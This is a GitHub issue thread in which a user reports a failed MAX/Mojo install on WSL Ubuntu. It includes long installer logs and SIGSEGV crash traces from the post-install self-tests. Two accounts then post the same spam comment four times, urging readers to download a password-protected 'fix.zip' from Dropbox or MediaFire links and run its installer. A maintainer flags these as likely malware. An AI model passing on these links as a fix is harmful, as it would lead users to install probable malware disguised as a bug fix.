### ISSUE TITLE
[BUG] Issue popped up when installing Max

### ISSUE THREAD

**Issue by jvossler** [modularml/mojo#3417]
### Bug description

ubuntu@DESKTOP-PECCAOU:~$ max --version
Command 'max' not found, did you mean:
  command 'nax' from snap nax (0.0.35)
  command 'mix' from deb elixir (1.14.0.dfsg-2)
  command 'vax' from deb simh (3.8.1-6.1)
  command 'pax' from deb pax (1:20201030-1build2)
  command 'man' from deb man-db (2.12.0-1)
  command 'maq' from deb maq (0.7.1-9)
  command 'mex' from deb texlive-lang-polish (2023.20231207-1)
  command 'mtx' from deb mtx (1.3.12-14build2)
  command 'mcx' from deb mcl (1:22-282+ds-2)
  command 'mux' from deb interception-tools (0.6.8-3build1)
  command 'fax' from deb efax (1:0.9a-21)
  command 'mag' from deb texlive-binaries (2023.20230311.66589-8build1)
See 'snap info <snapname>' for additional versions.
ubuntu@DESKTOP-PECCAOU:~$ mojo --version
mojo 24.4.0 (2cb57382)
ubuntu@DESKTOP-PECCAOU:~$ curl -s https://get.modular.com | sh -s -- ea7cc3c3-ef7f-450c-bc16-329156d7649b
Executing the  setup script for the 'modular/installer' repository ...

   OK: Checking for required executable 'curl' ...
   OK: Checking for required executable 'apt-get' ...
   OK: Detecting your OS distribution and release using system methods ...
 ^^^^: ... Detected/provided for your OS/distribution, version and architecture:
 >>>>:
 >>>>: ... distro=ubuntu  version=24.04  codename=noble  arch=x86_64
 >>>>:
   OK: Checking for apt dependency 'apt-transport-https' ...
   OK: Checking for apt dependency 'ca-certificates' ...
   OK: Checking for apt dependency 'gnupg' ...
   OK: Checking for apt signed-by key support ...
   OK: Importing 'modular/installer' repository GPG keys ...
   OK: Checking if upstream install config is OK ...
   OK: Installing 'modular/installer' repository via apt ...
   OK: Updating apt repository metadata cache ...
   OK: The repository has been installed successfully - You're ready to rock!

Reading package lists...
Building dependency tree...
Reading state information...
0 upgraded, 0 newly installed, 1 reinstalled, 0 to remove and 127 not upgraded.
Need to get 51.9 MB of archives.
After this operation, 0 B of additional disk space will be used.
Get:1 https://dl.modular.com/public/installer/deb/ubuntu noble/main amd64 modular amd64 0.9.2 [51.9 MB]
Fetched 51.9 MB in 2s (31.7 MB/s)
(Reading database ... 67177 files and directories currently installed.)
Preparing to unpack .../modular_0.9.2_amd64.deb ...
Unpacking modular (0.9.2) over (0.9.2) ...
Setting up modular (0.9.2) ...
Processing triggers for man-db (2.12.0-4build2) ...
__  __           _       _
|  \/  | ___   __| |_   _| | __ _ _ __
| |\/| |/ _ \ / _` | | | | |/ _` | '__|
| |  | | (_) | (_| | |_| | | (_| | |
|_|  |_|\___/ \__,_|\__,_|_|\__,_|_|

Welcome to the Modular CLI!

To get started, see:
MAX  - https://modul.ar/install-max
Mojo - https://modul.ar/install-mojo

For info about this tool, type "modular --help".
ubuntu@DESKTOP-PECCAOU:~$ python3.11 -m venv ~/max-venv && source ~/max-venv/bin/activate
(max-venv) ubuntu@DESKTOP-PECCAOU:~$ modular install max
# Found release for https://packages.modular.com/max @ 24.4.0
# Downloading archive: packages/24.4.0/max-x86_64-unknown-linux-gnu-24.4.0-6-0.tar.zst
Downloaded           [ █████████████████████████████████████████████████████████ ] 100% 651MiB/651MiB
# Extracting downloaded archives.
Extracted            [ █████████████████████████████████████████████████████████ ] 100% 651MiB/651MiB
# Running post-install scripts...
Checking conflicts   [ ██████████████░░░░░░░                                     ]  25%                               ==== CONFLICTING PACKAGES DETECTED ====

The MAX package is a superset of the Mojo package.

Having both standalone Mojo package and the MAX package installed
at the same time can cause version confusion.

We recommend uninstalling the standalone Mojo using `modular uninstall mojo`.  You can still use Mojo from the MAX package..

Mojo Interop         [ ████████████████████████████░░░░░░░                       ]  50%                               [mojo][error] Mojo SDK post-install test "`mojo build test_python.mojo`" failed:
SubprocessError: Command '/tmp/tmpm9773hzk/test_python' died with <Signals.SIGSEGV: 11>.
  File "/home/ubuntu/.modular/pkg/packages.modular.com_max/scripts/checks/self-test-complex.py", line 215, in test_mojo_build
    self.run(Path(tmp) / "test_python")[0],
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/ubuntu/.modular/pkg/packages.modular.com_max/scripts/checks/self-test-complex.py", line 172, in run
    raise SubprocessError(
[mojo][error] Mojo SDK post-install test "`mojo test_python.mojo`" failed:
SubprocessError: Command '/home/ubuntu/.modular/pkg/packages.modular.com_max/bin/mojo /home/ubuntu/.modular/pkg/packages.modular.com_max/test/test_python.mojo' died with <Signals.SIGSEGV: 11>.
  stderr:
    [1935:1935:20240825,221606.616110:ERROR file_io_posix.cc:144] open /sys/devices/system/cpu/cpu0/cpufreq/scaling_cur_freq: No such file or directory (2)
    [1935:1935:20240825,221606.616165:ERROR file_io_posix.cc:144] open /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq: No such file or directory (2)
    Please submit a bug report to https://github.com/modularml/mojo/issues and include the crash backtrace along with all the relevant source codes.
    Stack dump:
    0.  Program arguments: /home/ubuntu/.modular/pkg/packages.modular.com_max/bin/mojo /home/ubuntu/.modular/pkg/packages.modular.com_max/test/test_python.mojo
    [1935:1936:20240825,221606.616875:ERROR directory_reader_posix.cc:42] opendir /home/ubuntu/.modular/crashdb/attachments/73abcfba-d282-423b-9b52-eb372bdf3561: No such file or directory (2)
    Stack dump without symbol names (ensure you have llvm-symbolizer in your PATH or set the environment var `LLVM_SYMBOLIZER_PATH` to point to it):
    0  mojo      0x000056359fb79478
    1  mojo      0x000056359fb7729e
    2  mojo      0x000056359fb79b0d
    3  libc.so.6 0x00007fd6b7431320
    mojo crashed!
    Please file a bug report.
  File "/home/ubuntu/.modular/pkg/packages.modular.com_max/scripts/checks/self-test-complex.py", line 362, in test_mojo_run
    self.run_mojo(self.test_dir / "test_python.mojo")[0],
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/ubuntu/.modular/pkg/packages.modular.com_max/scripts/checks/self-test-complex.py", line 184, in run_mojo
    return self.run(self.mojo, subcommand, *args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/ubuntu/.modular/pkg/packages.modular.com_max/scripts/checks/self-test-complex.py", line 172, in run
    raise SubprocessError(
[mojo][error] Some components of the Mojo SDK may have been installed successfully, but others may not work as expected.
[mojo][error] Please submit an issue to https://github.com/modularml/mojo and include the full output of the command you just ran.
Mojo Interop         [ ████████████████████████████░░░░░░░                       ]  50%
modular: error: failed to run script
==========================
Failure Information:
        - Script: `PATH=/home/ubuntu/max-venv/bin:/home/ubuntu/.local/bin:/home/ubuntu/.modular/pkg/packages.modular.com_mojo/bin:/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/usr/lib/wsl/lib:/mnt/c/Program Files/Microsoft MPI/Bin/:/mnt/c/Program Files (x86)/VMware/VMware Workstation/bin/:/mnt/c/Program Files (x86)/Razer Chroma SDK/bin:/mnt/c/Program Files/Razer Chroma SDK/bin:/mnt/c/Program Files (x86)/Razer/ChromaBroadcast/bin:/mnt/c/Program Files/Razer/ChromaBroadcast/bin:/mnt/c/WINDOWS/system32:/mnt/c/WINDOWS:/mnt/c/WINDOWS/System32/Wbem:/mnt/c/WINDOWS/System32/WindowsPowerShell/v1.0/:/mnt/c/WINDOWS/System32/OpenSSH/:/mnt/c/Program Files/dotnet/:/mnt/c/Program Files (x86)/NVIDIA Corporation/PhysX/Common:/mnt/c/Program Files/nodejs/:/mnt/c/ProgramData/chocolatey/bin:/mnt/c/WINDOWS/system32/config/systemprofile/AppData/Local/Microsoft/WindowsApps:/mnt/c/Users/J/AppData/Local/Programs/Python/Python311/Scripts/:/mnt/c/Users/J/AppData/Local/Programs/Python/Python311/:/mnt/c/Users/J/AppData/Local/Microsoft/WindowsApps:/mnt/c/Users/J/AppData/Local/Programs/Microsoft VS Code/bin:/mnt/c/Users/J/.dotnet/tools:/mnt/c/Users/J/AppData/Local/GitHubDesktop/bin:/mnt/c/Users/J/.vscode-server-launcher/bin:/mnt/c/Users/J/.vscode-server-launcher/bin:/mnt/c/Users/J/.vscode-server-launcher/bin:/mnt/c/Users/J/AppData/Roaming/npm:/mnt/c/Program Files/Go/bin:/mnt/c/Program Files/Git/cmd:/mnt/c/Program Files/GitHub CLI/:/mnt/c/Program Files/Git LFS:/mnt/c/Users/J/AppData/Local/NVIDIA/ChatWithRTX/env_nvd_rag/Lib/site-packages/torch/lib:/mnt/c/Program Files/NVIDIA Corporation/NVIDIA App/NvDLISR:/mnt/c/Program Files/WireGuard/:/mnt/c/Program Files/Tailscale/:/mnt/c/Program Files/PuTTY/:/mnt/c/Program Files/PowerShell/7/:/mnt/c/Program Files/PowerShell/7-preview/preview:/mnt/c/Program Files/Docker/Docker/resources/bin:/mnt/c/Users/J/AppData/Local/Programs/Python/Python311/Scripts/:/mnt/c/Users/J/AppData/Local/Programs/Python/Python311/:/mnt/c/Users/J/AppData/Local/Microsoft/WindowsApps:/mnt/c/Users/J/AppData/Local/Programs/Microsoft VS Code/bin:/mnt/c/Users/J/.dotnet/tools:/mnt/c/Users/J/AppData/Local/GitHubDesktop/bin:/mnt/c/Users/J/.vscode-server-launcher/bin:/mnt/c/Users/J/.vscode-server-launcher/bin:/mnt/c/Users/J/.vscode-server-launcher/bin:/mnt/c/Users/J/AppData/Roaming/npm:/mnt/c/Users/J/go/bin:/mnt/c/Users/J/.dotnet/tools:/mnt/c/Users/J/AppData/Local/Programs/Microsoft VS Code Insiders/bin:/mnt/c/Program Files/Elastic/Beats/8.7.1:/mnt/c/Users/J/OneDrive/Documents/PowerShell/Scripts:/mnt/c/Program Files/mitmproxy/bin:/snap/bin:/home/ubuntu/.local/bin HOME=/home/ubuntu MODULAR_HOME=/home/ubuntu/.modular PYTHONPATH=/home/ubuntu/.modular/pkg/packages.modular.com_max/venv/lib/home/ubuntu/.modular/pkg/packages.modular.com_max/venv/bin/python /home/ubuntu/.modular/pkg/packages.modular.com_max/scripts/checks/self-test-complex.py --modular-home /home/ubuntu/.modular --modular-data /home/ubuntu/.modular --modular-config /home/ubuntu/.modular --package-path /home/ubuntu/.modular/pkg/packages.modular.com_max --mojo-config-section mojo-max --tests build,run`
        - Result: 1
        - Stderr:
[mojo][error] Mojo SDK post-install test "`mojo build test_python.mojo`" failed:
SubprocessError: Command '/tmp/tmpm9773hzk/test_python' died with <Signals.SIGSEGV: 11>.
  File "/home/ubuntu/.modular/pkg/packages.modular.com_max/scripts/checks/self-test-complex.py", line 215, in test_mojo_build
    self.run(Path(tmp) / "test_python")[0],
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/ubuntu/.modular/pkg/packages.modular.com_max/scripts/checks/self-test-complex.py", line 172, in run
    raise SubprocessError(
[mojo][error] Mojo SDK post-install test "`mojo test_python.mojo`" failed:
SubprocessError: Command '/home/ubuntu/.modular/pkg/packages.modular.com_max/bin/mojo /home/ubuntu/.modular/pkg/packages.modular.com_max/test/test_python.mojo' died with <Signals.SIGSEGV: 11>.
  stderr:
    [1935:1935:20240825,221606.616110:ERROR file_io_posix.cc:144] open /sys/devices/system/cpu/cpu0/cpufreq/scaling_cur_freq: No such file or directory (2)
    [1935:1935:20240825,221606.616165:ERROR file_io_posix.cc:144] open /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq: No such file or directory (2)
    Please submit a bug report to https://github.com/modularml/mojo/issues and include the crash backtrace along with all the relevant source codes.
    Stack dump:
    0.  Program arguments: /home/ubuntu/.modular/pkg/packages.modular.com_max/bin/mojo /home/ubuntu/.modular/pkg/packages.modular.com_max/test/test_python.mojo
    [1935:1936:20240825,221606.616875:ERROR directory_reader_posix.cc:42] opendir /home/ubuntu/.modular/crashdb/attachments/73abcfba-d282-423b-9b52-eb372bdf3561: No such file or directory (2)
    Stack dump without symbol names (ensure you have llvm-symbolizer in your PATH or set the environment var `LLVM_SYMBOLIZER_PATH` to point to it):
    0  mojo      0x000056359fb79478
    1  mojo      0x000056359fb7729e
    2  mojo      0x000056359fb79b0d
    3  libc.so.6 0x00007fd6b7431320
    mojo crashed!
    Please file a bug report.
  File "/home/ubuntu/.modular/pkg/packages.modular.com_max/scripts/checks/self-test-complex.py", line 362, in test_mojo_run
    self.run_mojo(self.test_dir / "test_python.mojo")[0],
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/ubuntu/.modular/pkg/packages.modular.com_max/scripts/checks/self-test-complex.py", line 184, in run_mojo
    return self.run(self.mojo, subcommand, *args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/ubuntu/.modular/pkg/packages.modular.com_max/scripts/checks/self-test-complex.py", line 172, in run
    raise SubprocessError(
[mojo][error] Some components of the Mojo SDK may have been installed successfully, but others may not work as expected.
[mojo][error] Please submit an issue to https://github.com/modularml/mojo and include the full output of the command you just ran.

==========================

Errors detected      [ █████████████████████████████████████████████████████████ ] 100%
                                                                 █
                                                             █  █
                                                       █    ██
                                                       █   ███   █
                                                       ██  ████  █
██      ███████   ████████       █████   ▐███████▌   ████████████
██      ▐█████▌   ███████▌   █   ▐█████▌   █████   ▐██████████████
██   ▌   █████   ▐   ████   ▐█▌   ███████   ▐█▌   █████████████████
██   █   ▐███▌   █   ███▌   ███   ▐███████▌     ▐██████████████████
██   █▌   ███   ▐█   ███   ▐███▌   ████████▌   ▐███████████████████
██   ██   ▐█▌   ██   ██▌           ▐██████▌     ▐██████████████████
██   ██▌   █   ▐██   ██             █████   ▐█▌   █████████████████
██   ███       ███   █▌   ███████   ▐██▌   █████   ▐██████████████
██   ███▌     ▐███   █   ▐███████▌   █   ▐███████▌   ████████████

MAX is now installed! Almost...

## FINISH THE INSTALL

Install the MAX Python package and set environment variables as per:
https://modul.ar/get-started

## NEXT STEPS

You can now access the 'max' and 'mojo' CLI tools.
Enter 'max --help' or 'mojo --help'.

For MAX docs, see https://docs.modular.com.
For MAX code examples, see https://github.com/modularml/max.

(max-venv) ubuntu@DESKTOP-PECCAOU:~$ 

### Steps to reproduce

- Include relevant code snippet or link to code that did not work as expected.
- If applicable, add screenshots to help explain the problem.
- If using the Playground, name the pre-existing notebook that failed and the steps that led to failure.
- Include anything else that might help us debug the issue.

### System information

```shell
- What OS did you do install Mojo on ?
(max-venv) ubuntu@DESKTOP-PECCAOU:~$ cat /etc/os-release
PRETTY_NAME="Ubuntu 24.04 LTS"
NAME="Ubuntu"
VERSION_ID="24.04"
VERSION="24.04 LTS (Noble Numbat)"
VERSION_CODENAME=noble
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=noble
LOGO=ubuntu-logo
(max-venv) ubuntu@DESKTOP-PECCAOU:~$

- Provide version information for Mojo by pasting the output of `mojo -v`
(max-venv) ubuntu@DESKTOP-PECCAOU:~$ mojo -v
mojo 24.4.0 (2cb57382)
(max-venv) ubuntu@DESKTOP-PECCAOU:~$

- Provide Modular CLI version by pasting the output of `modular -v`
(max-venv) ubuntu@DESKTOP-PECCAOU:~$ modular -v
modular 0.9.2 (b3079bd5)
(max-venv) ubuntu@DESKTOP-PECCAOU:~$
```

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jvossler** [comment]
What is that file?

**Comment by soraros** [comment]
@jvossler It's likely malware/ad from a spamming account. Please don't click on the link or download anything.

**Comment by jvossler** [comment]
Okay thanks @soraros
